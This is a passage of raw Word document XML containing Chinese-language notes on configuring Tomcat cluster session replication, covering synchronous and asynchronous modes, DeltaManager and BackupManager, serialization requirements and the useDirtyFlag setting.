      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>拷贝到其他节点之后才可以完成；异步模式无需等待</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>拷贝完就可响应。默认是异步模式</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>channelSendOptions=8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为同步。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00F37684">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用来在节点间拷贝</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，默认使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DeltaManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DeltaManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>采用的一种</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>all-to-all</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的工作方式，即集群中的节点会把</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据向所有其他节点拷贝，而不管其他节点是否部署了当前应用。当集群中的节点数量很多并且部署着不同应用时，可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BackupManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BackManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>仅向部署了当前应用的节点拷贝</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。但是到目前为止</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BackupManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>并未经过大规模测试，可靠性不及</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DeltaManager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00F37684">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://zyycaesar.iteye.com/blog/296606</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00007186" w:rsidRDefault="00F37684" w:rsidP="006906B7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>只需要修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00007186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>server.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00007186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="006906B7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>用户存入</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>中的数据的问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="006906B7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>集群进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>复制，必须要保证你的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>中存放的所有对象都是实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>java.io.Serializable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>接口的，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>复制就是序列化对象到其他</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>应用服务器上的，所以如果没有实现该接口，那么</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>同步将会失败。另外一点，就是如果要同步的机器比较多的话，那么要注意保证</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>中存放的数据比较小，不要什么都存放到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>中，因为复制</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>也是需要开销的，数据越大开销也越大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="006906B7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(2)Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>复制的触发条件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="006906B7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>我们在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>文件中集群部分</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cluster</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>标签中可以看到属性：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>useDirtyFlag</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，如果这个设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>（默认的），那么只有当使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>setAttribute</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>往</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>中设置数据的时候才会同步其他</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>服务器的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SESSION</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，如果为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>false,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>那么每一次请求的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sesison</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>都会被同步到其他服务器上。因此在操作</w:t>
      </w:r>
